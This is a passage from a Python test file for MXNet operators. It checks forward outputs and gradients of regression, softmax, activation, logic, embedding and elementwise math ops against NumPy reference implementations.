check_slice_channel(data_ndim=3, axis=-1, num_outputs=2, squeeze_axis=False)
check_slice_channel(data_ndim=5, axis=-2, num_outputs=3, squeeze_axis=True)
@with_seed()
def test_regression():
''' test regression operator '''
def check_regression(symbol, forward, backward, shape, stype='default', densities=[0, 0.5, 1]):
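        # Added note (not in the original test): `forward` is the reference numpy forward
        # function and `backward` the reference gradient w.r.t. the data; the reference
        # gradient is divided by shape[1] below so it matches what the operator produces.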
# init executor
data = mx.symbol.Variable('data')
label = mx.symbol.Variable('label', stype=stype)
out = symbol(data, label)
grad_req = {'data': 'write', 'label': 'null'}
out_exec = out.simple_bind(default_context(), grad_req=grad_req,
data=shape, label=shape)
arg_map = dict(zip(out.list_arguments(), out_exec.arg_arrays))
grad_map = dict(zip(out.list_arguments(), out_exec.grad_arrays))
# init data
arr_data = mx.random.uniform(-1, 1, shape)
arg_map["data"][:] = arr_data
# init label based on density
arr_label = arg_map["label"]
atol = 1e-5
for density in densities:
arr_label[:] = rand_ndarray(shape, stype, density=density)
out_exec.forward(is_train=True)
out_exec.backward()
np_out = forward(arr_data.asnumpy())
out_grad = backward(np_out, arr_label.asnumpy().reshape(np_out.shape)) / shape[1]
assert_almost_equal(out_exec.outputs[0], np_out, atol=atol)
assert_almost_equal(grad_map["data"], out_grad, atol=atol)
shape = (50, 30)
check_regression(mx.symbol.LogisticRegressionOutput,
lambda x: 1.0 / (1.0 + np.exp(-x)),
lambda x, y : x - y,
shape)
check_regression(mx.symbol.LinearRegressionOutput,
lambda x: x,
lambda x, y : x - y,
shape)
check_regression(mx.symbol.MAERegressionOutput,
lambda x: x,
lambda x, y : np.where(x > y, np.ones(x.shape), -np.ones(x.shape)),
shape)
check_regression(mx.symbol.LogisticRegressionOutput,
lambda x: 1.0 / (1.0 + np.exp(-x)),
lambda x, y : x - y,
shape, stype='csr')
check_regression(mx.symbol.LinearRegressionOutput,
lambda x: x,
lambda x, y : x - y,
shape, stype='csr')
def check_softmax_grad(xpu):
x = mx.sym.Variable('x')
label = mx.sym.Variable('label')
x_nd = mx.nd.array([[1, 6, 4, 2]], ctx=xpu)
grad_x = mx.nd.zeros((1,4), ctx=xpu)
label_nd = mx.nd.array([1], ctx=xpu)
sym = mx.sym.SoftmaxOutput(data=x, label=label, ignore_label=0, use_ignore=False)
ex = sym.bind(ctx=xpu, args={'x': x_nd, 'label': label_nd}, args_grad={'x': grad_x})
ex.forward(is_train=True)
softmax_out = ex.outputs[0].asnumpy()
expected_softmax_out = [[0.005806628, 0.861780069, 0.116629249, 0.015784052]]
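    # These expected values are softmax([1, 6, 4, 2]) worked out by hand:
    # exp([1, 6, 4, 2]) is approximately [2.71828, 403.42879, 54.59815, 7.38906],
    # their sum is approximately 468.13428, and dividing each term by that sum
    # gives the four probabilities above.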
assert np.isclose(softmax_out, expected_softmax_out).all()
ex.backward(is_train=True)
grad_out = ex.grad_arrays[0].asnumpy()
k = int(label_nd[0].asscalar())
expected_grad_out = np.zeros((1,4))
expected_grad_out[0, k] = -1
assert np.isclose(grad_out - softmax_out, expected_grad_out).all()
def check_smoothed_softmax_grad(xpu):
alpha = 0.2
x = mx.sym.Variable('x')
label = mx.sym.Variable('label')
x_nd = mx.nd.array([[1, 6, 4, 2]], ctx=xpu)
grad_x = mx.nd.zeros((1,4), ctx=xpu)
label_nd = mx.nd.array([1], ctx=xpu)
sym = mx.sym.SoftmaxOutput(data=x, label=label, ignore_label=0, use_ignore=False, smooth_alpha=alpha)
ex = sym.bind(ctx=xpu, args={'x': x_nd, 'label': label_nd}, args_grad={'x': grad_x})
ex.forward(is_train=True)
softmax_out = ex.outputs[0].asnumpy()
expected_softmax_out = [[0.005806628, 0.861780069, 0.116629249, 0.015784052]]
assert np.isclose(softmax_out, expected_softmax_out).all()
ex.backward(is_train=True)
grad_out = ex.grad_arrays[0].asnumpy()
k = int(label_nd[0].asscalar())
expected_grad_out = np.full((1,4), fill_value=-alpha/float(4-1))
expected_grad_out[0, k] = - (1 - alpha)
assert np.isclose(grad_out - softmax_out, expected_grad_out).all()
def check_softmax_with_ignore_label(xpu):
X = mx.symbol.Variable('X')
L = mx.symbol.Variable('L')
Y = mx.symbol.SoftmaxOutput(data=X, label=L, ignore_label=0, use_ignore=True)
shape = (20, 10)
x = mx.nd.empty(shape, ctx = xpu)
l = mx.nd.empty((shape[0],), ctx = xpu)
x_np = np.random.rand(*shape)
l_np = np.random.randint(0, shape[1]-1, (shape[0],))
x[:] = x_np
l[:] = l_np
grad = mx.nd.empty(shape, ctx = xpu)
exec1 = Y.bind(xpu, args = [x, l], args_grad = {'X': grad})
exec1.forward(is_train=True)
exec1.backward()
grad0 = grad.asnumpy()
for i in range(int(shape[0]/2)):
l_np[i] = 0
l[:] = l_np
exec1.forward(is_train=True)
exec1.backward()
grad1 = grad.asnumpy()
assert abs(np.sum(grad1[:int(shape[0]/2)])) < 1e-5
assert_almost_equal(grad0[int(shape[0]/2):], grad1[int(shape[0]/2):])
def check_softmax_with_shape(shape, xpu, preserve_shape=False):
# bind with label
X = mx.symbol.Variable('X')
L = mx.symbol.Variable('L')
Y = mx.symbol.SoftmaxOutput(data=X, label=L, preserve_shape=preserve_shape)
x = mx.random.uniform(-1, 1, shape, ctx=xpu)
l = mx.random.uniform(-1, 1, shape, ctx=xpu)
l[:] = np_softmax(l.asnumpy())
grad = mx.nd.empty(shape, ctx = xpu)
exec1 = Y.bind(xpu, args = [x, l], args_grad = {'X': grad})
exec1.forward(is_train=True)
out = exec1.outputs[0].asnumpy()
# Non-zero atol required by test_softmax with seed 781663739
rtol = 1e-4
atol = 1e-6
assert_almost_equal(out, np_softmax(x.asnumpy()), rtol=rtol, atol=atol)
exec1.backward()
assert_almost_equal(grad, np_softmax(x.asnumpy()) - l.asnumpy(), rtol=rtol, atol=atol)
def test_python_op():
X = mx.symbol.Variable('X')
op = mx.operator.NumpyOp()
s = op.get_symbol(X, name='numpy_op')
x = mx.ndarray.ones((10))*10
dx = mx.ndarray.zeros((10))
dy = mx.ndarray.ones((10))
exec1 = s.bind(default_context(), args=[x], args_grad = {'X': dx})
exec1.forward(is_train=True)
assert_almost_equal(x, exec1.outputs[0])
exec1.backward(dy)
assert_almost_equal(dy, dx)
def test_swapaxes():
data = mx.symbol.Variable('data')
shape = (2, 3, 4)
data_tmp = np.ones(shape)
data_tmp[0] = 1
data_tmp[1] = 2
arr_data = mx.nd.array(data_tmp)
swap0 = mx.symbol.SwapAxis(data=data, dim1=0, dim2=2)
swap = mx.symbol.SwapAxis(data=swap0, dim1=1, dim2=2)
exe_c = swap.bind(default_context(), args=[arr_data])
exe_c.forward(is_train=True)
out = exe_c.outputs[0]
swap0_ = np.swapaxes(data_tmp, 0, 2)
swap_ = np.swapaxes(swap0_, 1, 2)
assert_almost_equal(out, swap_)
config = [((1, 1, 2), 0, 1),
((1, 1, 2), -1, -2),
((4, 5, 6, 7), 1, 1),
((4, 5, 6, 7), 2, 3),
((4, 5, 6, 7), -2, 2),
((4, 5, 6, 7), -2, -3)]
for shape, axis1, axis2 in config:
data_np = np.random.uniform(size=shape)
data_mx = mx.nd.array(data_np, dtype=data_np.dtype)
ret_np = np.swapaxes(data_np, axis1=axis1, axis2=axis2)
ret_mx = mx.symbol.SwapAxis(data, dim1=axis1, dim2=axis2)
exe_c = ret_mx.bind(default_context(), args=[data_mx])
exe_c.forward(is_train=True)
out = exe_c.outputs[0]
assert_almost_equal(out, ret_np)
@xfail_when_nonstandard_decimal_separator
@with_seed()
def test_scalarop():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)*5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = 2 / (4-((1+data+1)*2/5)-0.8-(data!=0))
npout_1 = (4-((1+data_tmp+1)*2/5)-0.8-(data_tmp!=0))
npout = 2/npout_1
check_symbolic_forward(test, [data_tmp], [npout])
npout_grad = 2.*2/5
npout_grad = 2*npout_grad /(npout_1 *npout_1 )
check_symbolic_backward(test, [data_tmp], [np.ones(shape)*2], [npout_grad])
@with_seed()
def test_scalar_pow():
data = mx.symbol.Variable('data')
shape = (1, 1)
data_tmp = np.ones(shape)
test = data ** 2
check_numeric_gradient(test, [data_tmp])
check_symbolic_forward(test, [data_tmp], [data_tmp ** 2])
check_symbolic_backward(test, [data_tmp], [np.ones(shape)], [2 * data_tmp])
@with_seed()
def test_symbol_pow():
shape = (1, 1)
data = mx.symbol.Variable('data')
data_tmp = np.ones(shape)*2
exp = mx.symbol.Variable('exp')
exp_tmp = np.ones(shape)*3
test = data**exp
check_numeric_gradient(test, [data_tmp, exp_tmp])
check_symbolic_forward(test, [data_tmp, exp_tmp], [data_tmp**exp_tmp])
data_dir = data_tmp**(exp_tmp - 1) * exp_tmp
exp_dir = data_tmp**(exp_tmp) * np.log(data_tmp)
check_symbolic_backward(test, [data_tmp, exp_tmp], [np.ones(shape)], [data_dir, exp_dir])
@with_seed()
def test_fully_connected():
data = mx.sym.var("data")
fc_weight = mx.sym.var("weight")
fc_bias = mx.sym.var("bias")
fc = mx.sym.FullyConnected(data=data, weight=fc_weight, bias=fc_bias, num_hidden=10, no_bias=False, name='fc')
data = mx.nd.random.uniform(shape=(5, 5, 5, 13), dtype=np.float32)
fc_weight = mx.nd.random.uniform(shape=(10, 325), dtype=np.float32)
fc_bias = mx.nd.random.uniform(shape=(10), dtype=np.float32)
fc_bias2 = mx.nd.random.uniform(shape=(10, 1), dtype=np.float32)
data_np = data.asnumpy().reshape(5, 325)
fc_weight_np = np.transpose(fc_weight.asnumpy())
fc_bias_np = fc_bias.asnumpy()
res = np.dot(data_np, fc_weight_np) + fc_bias.asnumpy()
check_symbolic_forward(fc, {'data': data_np, 'weight': fc_weight.asnumpy(), 'bias': fc_bias_np}, {'fc_output': res})
check_numeric_gradient(fc, {'data': data_np, 'weight': fc_weight.asnumpy(), 'bias': fc_bias_np},
numeric_eps=1e-2, rtol=1e-4, atol=1e-2)
# TODO: Fix Bug #15032 when bias has ndim > 1
#check_symbolic_forward(fc, {'data': data_np, 'weight': fc_weight.asnumpy(), 'bias': fc_bias2.asnumpy()}, {'fc_output': res})
@with_seed()
def test_pow_fn():
shape = (3, 4)
exp = mx.symbol.Variable("exp")
x = np.ones(shape)*3
for y in [mx.sym.pow(2, exp), mx.sym.power(2, exp)]:
check_numeric_gradient(y, [x], numeric_eps=1E-3)
check_symbolic_forward(y, [x], [2**x])
check_symbolic_backward(y, [x], [np.ones(shape)], [np.log(2) * 2**x])
@with_seed()
def test_relu():
def frelu(x):
return np.maximum(x, 0.0)
def frelu_grad(x):
return 1.0 * (x > 0.0)
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.relu(x)
xa = np.random.uniform(low=-1.0,high=1.0,size=shape)
eps = 1e-4
# Avoid finite difference method inaccuracies due to discontinuous gradient at the origin.
# Here we replace small problematic inputs with 1.0. Repro issue with seed 97264195.
xa[abs(xa) < eps] = 1.0
ya = frelu(xa)
ga = frelu_grad(xa)
check_numeric_gradient(y, [xa], numeric_eps=eps)
check_symbolic_forward(y, [xa], [ya])
check_symbolic_backward(y, [xa], [np.ones(shape)], [ga])
# NOTE(haojin2): Skipping the numeric check tests for float16 data type due to precision issues,
# the analytical checks are still performed on each and every data type to verify the correctness.
@with_seed()
def test_leaky_relu():
def fleaky_relu(x, act_type, slope=0.25):
neg_indices = x < 0
out = x.copy()
if act_type == 'elu':
out[neg_indices] = slope * np.expm1(out[neg_indices])
elif act_type == 'leaky':
out[neg_indices] = slope * out[neg_indices]
return out
def fleaky_relu_grad(grad, x, y, act_type, slope=0.25):
neg_indices = x < 0
out = np.ones(x.shape)
if act_type == 'elu':
out[neg_indices] = y[neg_indices] + slope
elif act_type == 'leaky':
out[neg_indices] = slope
return out * grad
for ndim in range(1, 4):
shape = rand_shape_nd(ndim)
x = mx.symbol.Variable("x")
slp = 0.25
for dtype in [np.float16, np.float32, np.float64]:
xa = np.random.uniform(low=-1.0,high=1.0,size=shape).astype(dtype)
eps = 1e-4
rtol = 1e-2
atol = 1e-3
xa[abs(xa) < eps] = 1.0
for act_type in ['elu', 'leaky']:
y = mx.symbol.LeakyReLU(data=x, slope=slp, act_type=act_type)
ya = fleaky_relu(xa, slope=slp, act_type=act_type)
ga = fleaky_relu_grad(np.ones(shape), xa, ya, slope=slp, act_type=act_type)
# Skip numeric check for float16 type to get rid of flaky behavior
if dtype is not np.float16:
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape)], [ga], rtol=rtol, atol=atol, dtype=dtype)
# NOTE(haojin2): Skipping the numeric check tests for float16 data type due to precision issues,
# the analytical checks are still performed on each and every data type to verify the correctness.
@with_seed()
def test_prelu():
def fprelu(x, gamma):
pos_indices = x > 0
out = x.copy()
if len(x.shape) == 4:
out = out.transpose(2,3,0,1)
out = np.multiply(out, gamma)
out = out.transpose(2,3,0,1)
else:
out = np.multiply(out, gamma)
out[pos_indices] = x[pos_indices]
return out
def fprelu_grad(x, y, gamma):
pos_indices = x > 0
if len(x.shape) == 4:
grad_x = np.multiply(np.ones(x.shape).transpose(2,3,0,1), gamma)
grad_x = grad_x.transpose(2,3,0,1)
else:
grad_x = np.multiply(np.ones(x.shape), gamma)
grad_gam = np.zeros(gamma.shape)
copy_x = x.copy()
copy_x[pos_indices] = 0.0
grad_x[pos_indices] = 1.0
if len(gamma.shape) > 1 and len(x.shape) != 4:
grad_gam = copy_x
elif len(gamma.shape) > 1 and len(x.shape) == 4:
grad_gam = np.sum(copy_x, axis=(2,3))
elif gamma.shape[0] == 1:
grad_gam = np.sum(np.sum(copy_x))
elif gamma.shape[0] > 1 and len(x.shape) != 4:
grad_gam = np.sum(copy_x, axis=0)
elif gamma.shape[0] > 1 and len(x.shape) == 4:
grad_gam = np.sum(copy_x, axis=(0,2,3))
return (grad_x, grad_gam)
x = mx.symbol.Variable("x")
gamma = mx.symbol.Variable("gamma")
for shape in [(3,4), (3,4,4,5)]:
for dtype in [np.float16, np.float32, np.float64]:
for gam in [np.array([0.1, 0.2, 0.3, 0.4], dtype=dtype)]:
gam_full = np.array([gam, gam, gam])
xa = np.random.uniform(low=-1.0,high=1.0,size=shape).astype(dtype)
rtol = 1e-2
atol = 1e-3
eps = 1e-4
xa[abs(xa) < eps] = 1.0
y = mx.symbol.LeakyReLU(data=x, gamma=gamma, act_type='prelu')
ya = fprelu(xa, gam)
ya_full = fprelu(xa, gam_full)
g_xa, g_gam = fprelu_grad(xa, ya, gamma=gam)
g_xa_full, g_gam_full = fprelu_grad(xa, ya_full, gamma=gam_full)
# Skip numeric check for float16 type to get rid of flaky behavior
if dtype is not np.float16:
check_numeric_gradient(y, [xa, gam], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_numeric_gradient(y, [xa, gam_full], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa, gam], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa, gam], [np.ones(shape), np.ones(gam.shape)], [g_xa, g_gam], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa, gam_full], [ya_full], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa, gam_full], [np.ones(shape), np.ones(gam_full.shape)],
[g_xa_full, g_gam_full], rtol=rtol, atol=atol, dtype=dtype)
@with_seed()
def test_selu():
alpha = 1.6732632423543772848170429916717
lamb = 1.0507009873554804934193349852946
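    # alpha and lamb are the standard SELU constants from Klambauer et al.,
    # "Self-Normalizing Neural Networks" (2017); fselu below computes
    # lamb * x for x >= 0 and lamb * alpha * (exp(x) - 1) for x < 0.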
def fselu(x):
neg_indices = x < 0
out = x.copy()
out[neg_indices] = alpha * np.expm1(out[neg_indices])
return out * lamb
def fselu_grad(grad, x, y):
neg_indices = x < 0
out = np.ones(x.shape).astype(x.dtype)
out[neg_indices] = y[neg_indices] + alpha
return out * lamb
shape = (3, 4)
x = mx.sym.Variable("x")
y = mx.sym.LeakyReLU(data=x, act_type="selu")
for dtype in [np.float16, np.float32, np.float64]:
xa = np.random.uniform(low=-0.1,high=0.1,size=shape).astype(dtype)
eps, rtol, atol = (7.5e-4, 1e-1, 1e-2) if dtype is np.float16 else (1e-4, 1e-2, 1e-4)
if dtype is np.float16:
xa /= 10.0
xa[abs(xa) < eps] = 0.01
ya = fselu(xa)
ga = fselu_grad(np.ones(shape).astype(dtype), xa, ya)
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape)], [ga], rtol=rtol, atol=atol, dtype=dtype)
@with_seed()
def test_gelu():
CUBE_CONSTANT = 0.044715
ROOT_TWO_OVER_PI = 0.7978845608028654
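    # The helper functions below implement the tanh approximation of GELU:
    #   gelu(x) ~= 0.5 * x * (1 + tanh(sqrt(2/pi) * (x + 0.044715 * x**3)))
    # where ROOT_TWO_OVER_PI = sqrt(2/pi) and CUBE_CONSTANT = 0.044715.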
def g(x):
return ROOT_TWO_OVER_PI * (x + CUBE_CONSTANT * np.power(x, 3))
def g_grad(x):
return ROOT_TWO_OVER_PI * (1.0 + 3.0 * CUBE_CONSTANT * np.power(x, 2))
def f(x):
return 1.0 + np.tanh(g(x))
def f_grad(x):
return (1.0 - np.tanh(g(x)) * np.tanh(g(x))) * g_grad(x)
def fgelu(x):
return 0.5 * x * f(x)
def fgelu_grad(grad, x, y):
return grad * (y / x + y * (1 - np.tanh(g(x))) * g_grad(x))
shape = (3, 4)
x = mx.sym.Variable("x")
y = mx.sym.LeakyReLU(data=x, act_type="gelu")
for dtype in [np.float16, np.float32, np.float64]:
xa = np.random.uniform(low=-0.1,high=0.1,size=shape).astype(dtype)
eps, rtol, atol = (7.5e-4, 2e-2, 1e-3) if dtype is np.float16 else (1e-4, 1e-3, 1e-5)
if dtype is np.float16:
xa /= 10.0
xa[abs(xa) < eps] = 0.01
ya = fgelu(xa)
ga = fgelu_grad(np.ones(shape).astype(dtype), xa, ya)
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape)], [ga], rtol=rtol, atol=atol, dtype=dtype)
@with_seed()
def test_sigmoid():
def fsigmoid(a):
return np.divide(1.0, (1.0 + np.exp(-a)))
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.sigmoid(x)
xa = np.random.uniform(low=-1.0,high=1.0,size=shape)
ya = fsigmoid(xa)
check_numeric_gradient(y, [xa], numeric_eps=1E-3)
check_symbolic_forward(y, [xa], [ya])
check_symbolic_backward(y, [xa], [np.ones(shape)], [ya * (1 - ya)])
@with_seed()
def test_shape_array():
for i in range(1,6):
shape = rand_shape_nd(i)
x = mx.sym.var('x')
y = mx.sym.shape_array(x)
xa = mx.nd.array(np.random.ranf(shape))
xg = mx.nd.empty(xa.shape)
ya = np.shape(xa)
yg = mx.nd.ones(ya)
exe = y.bind(ctx=default_context(), args={'x': xa},
args_grad={'x': xg})
exe.forward(is_train=True)
exe.backward([yg])
yo = exe.outputs[0].asnumpy()
same(yo, ya)
assert_almost_equal(xg, np.zeros_like(xg.asnumpy()))
@with_seed()
def test_size_array():
for i in range(1,6):
shape = rand_shape_nd(i)
x = mx.sym.var('x')
y = mx.sym.size_array(x)
xa = mx.nd.array(np.random.ranf(shape))
xg = mx.nd.empty(xa.shape)
ya = np.size(xa)
yg = mx.nd.ones(ya)
exe = y.bind(ctx=default_context(), args={'x': xa},
args_grad={'x': xg})
exe.forward(is_train=True)
exe.backward([yg])
yo = exe.outputs[0].asnumpy()
same(yo, ya)
assert_almost_equal(xg, np.zeros_like(xg.asnumpy()))
@with_seed()
def test_hard_sigmoid():
def fhardsigmoid(a, alpha=0.2, beta=0.5):
return np.maximum(np.zeros(a.shape, dtype=a.dtype),
np.minimum(np.ones(a.shape, dtype=a.dtype), alpha*a+beta))
def fhardsigmoid_grad(a, out_grad, alpha=0.2, beta=0.5):
orig_out = fhardsigmoid(a, alpha, beta)
res = out_grad * alpha
res[orig_out <= 0.0] = 0.0
res[orig_out >= 1.0] = 0.0
return res
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.hard_sigmoid(x)
for dtype in [np.float16, np.float32, np.float64]:
if dtype is np.float16:
rtol = 1e-2
else:
rtol = 1e-3
atol = 1e-3
eps = 1e-3
xa = np.random.uniform(low=-3.0,high=3.0,size=shape).astype(dtype)
# function not differentiable at x=2.5 and -2.5
xa[abs(xa-2.5) < eps] -= 2 * eps
xa[abs(xa+2.5) < eps] += 2 * eps
ya = fhardsigmoid(xa)
grad_xa = fhardsigmoid_grad(xa, np.ones(shape))
if dtype is not np.float16:
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape)], [grad_xa], rtol=rtol, atol=atol, dtype=dtype)
@with_seed()
def test_softsign():
def fsoftsign(a):
return np.divide(a, (1.0 + np.abs(a)))
def fsoftsign_grad(a):
return np.divide(1.0, np.square((1.0 + np.abs(a))))
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.softsign(x)
xa = np.random.uniform(low=-1.0,high=1.0,size=shape)
ya = fsoftsign(xa)
ya_grad = fsoftsign_grad(xa)
check_numeric_gradient(y, [xa], numeric_eps=1E-3)
check_symbolic_forward(y, [xa], [ya])
check_symbolic_backward(y, [xa], [np.ones(shape)], [ya_grad])
@with_seed()
def test_binary_logic():
def _inner_test(forward_gt, logic_sym, x_shape, y_shape, test_scalar=True):
x = mx.symbol.Variable("x")
y = mx.symbol.Variable("y")
z = logic_sym(x, y)
x_npy = np.random.randint(0, 4, size=x_shape).astype(np.float32)
y_npy = np.random.randint(0, 4, size=y_shape).astype(np.float32)
exe = z.simple_bind(ctx=default_context(), x=x_shape, y=y_shape)
mx_out = exe.forward(is_train=True, x=x_npy, y=y_npy)[0]
assert_almost_equal(mx_out, forward_gt(x_npy, y_npy))
exe.backward()
if test_scalar:
z_lscalar = logic_sym(1, y)
z_rscalar = logic_sym(x, 1)
exe_lscalar = z_lscalar.simple_bind(ctx=default_context(), y=y_shape)
exe_rscalar = z_rscalar.simple_bind(ctx=default_context(), x=x_shape)
mx_lscalar_out = exe_lscalar.forward(is_train=True, y=y_npy)[0]
mx_rscalar_out = exe_rscalar.forward(is_train=True, x=x_npy)[0]
assert_almost_equal(mx_lscalar_out, forward_gt(1, y_npy))
assert_almost_equal(mx_rscalar_out, forward_gt(x_npy, 1))
exe_lscalar.backward()
exe_rscalar.backward()
# Test the no-broadcasting binary logic ops + scalar logic ops
_inner_test(forward_gt=lambda x, y: x == y,
logic_sym=lambda x, y: x == y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x > y,
logic_sym=lambda x, y: x > y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x >= y,
logic_sym=lambda x, y: x >= y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x < y,
logic_sym=lambda x, y: x < y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x <= y,
logic_sym=lambda x, y: x <= y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x != y,
logic_sym=lambda x, y: x != y, x_shape=(10, 10), y_shape=(10, 10))
# Test the broadcasting binary logic ops
_inner_test(forward_gt=lambda x, y: x == y,
logic_sym=lambda x, y: mx.sym.broadcast_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x > y,
logic_sym=lambda x, y: mx.sym.broadcast_greater(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x >= y,
logic_sym=lambda x, y: mx.sym.broadcast_greater_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x < y,
logic_sym=lambda x, y: mx.sym.broadcast_lesser(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x <= y,
logic_sym=lambda x, y: mx.sym.broadcast_lesser_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x != y,
logic_sym=lambda x, y: mx.sym.broadcast_not_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
@with_seed()
def test_unary_logic():
def reference(a, dtype):
return np.logical_not(a).astype(dtype)
shape = (3, 4)
xa = np.random.randint(-2, 2, size=shape).astype(np.float32)
mx_xa = mx.nd.array(xa)
mx_out = mx.nd.logical_not(mx_xa)
assert_almost_equal(mx_out, reference(xa, dtype=xa.dtype))
x = mx.sym.Variable('x')
y = mx.sym.logical_not(data=x)
exe = y.simple_bind(ctx=default_context(), x=shape)
sym_out = exe.forward(is_train=True, x=mx_xa)[0]
assert_almost_equal(sym_out, reference(xa, dtype=xa.dtype))
@with_seed()
def test_embedding():
in_dim = 10
out_dim = 4
batch = 24
data = mx.sym.Variable("data")
embed = mx.sym.Embedding(data=data, input_dim=in_dim, output_dim=out_dim, name="embed")
exe_test = embed.simple_bind(default_context(), grad_req={'data': 'null', 'embed_weight': 'write'}, data=(batch,))
arg_map = dict(zip(embed.list_arguments(), exe_test.arg_arrays))
grad_map = dict(zip(embed.list_arguments(), exe_test.grad_arrays))
np_data = np.random.randint(low=0, high=in_dim, size=batch)
np_weight = np.random.uniform(-0.01, 0.01, arg_map["embed_weight"].shape)
np_onehot = np.zeros((batch, in_dim))
np_onehot[np.arange(batch), np_data] = 1.0
# forward
arg_map["data"][:] = np_data
arg_map["embed_weight"][:] = np_weight
exe_test.forward(is_train=True)
# Non-zero atol required, as exposed by seed 781663739
rtol = 1e-5
atol = 1e-5
assert_almost_equal(exe_test.outputs[0], np.dot(np_onehot, np_weight), rtol=rtol, atol=atol)
# backward
np_grad = np.random.uniform(-1, 1, exe_test.outputs[0].shape)
grad = mx.nd.zeros(np_grad.shape)
grad[:] = np_grad
exe_test.backward([grad])
assert_almost_equal(grad_map["embed_weight"], np.dot(np_onehot.T, np_grad), rtol=rtol, atol=atol)
# check ops handle duplicate input correctly.
@with_seed()
def test_binary_op_duplicate_input():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:] = 5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:] = 3
out_grad = mx.nd.empty(shape)
out_grad[:] = 1
square = data * data
exe_square = square.bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_square.forward(is_train=True)
assert_almost_equal(exe_square.outputs[0], data_tmp * data_tmp)
exe_square.backward(out_grad)
assert_almost_equal(arr_grad, 2.0 * data_tmp)
@with_seed()
def test_sign():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = mx.sym.sign(data)
exe_test = test.bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = np.sign(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
    out_grad[:] = 2
    npout_grad = np.zeros(shape)  # the gradient of sign() is zero everywhere
exe_test.backward(out_grad)
assert_almost_equal(arr_grad, npout_grad)
@with_seed()
def test_round_ceil_floor():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5.543
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]= 2
test = mx.sym.round(data) + mx.sym.ceil(data) + mx.sym.floor(data)
exe_test = test.bind(default_context(), args=[arr_data])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = np.round(data_tmp) + np.ceil(data_tmp) + np.floor(data_tmp)
assert_almost_equal(out, npout)
@with_seed()
def test_trunc():
data_tmp = np.random.rand(3, 4) * 10 - 5
arr_data = mx.nd.array(data_tmp)
data = mx.symbol.Variable('data')
test = mx.sym.trunc(data)
exe_test = test.bind(default_context(), args=[arr_data])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
# 'trunc' is sensitive to the precision of the calculation. Force numpy to match mxnet's float32.
# Repro issue with seed 1660190454
npout = np.trunc(np.float32(data_tmp))
assert_almost_equal(out, npout)
@with_seed()
def test_rsqrt_cos_sin():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:] = 5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:] = 3
test = mx.sym.rsqrt(data) + mx.sym.cos(data) + mx.sym.sin(data)
exe_test = test.bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = 1 / np.sqrt(data_tmp) + np.cos(data_tmp) + np.sin(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2
npout_grad = out_grad.asnumpy()
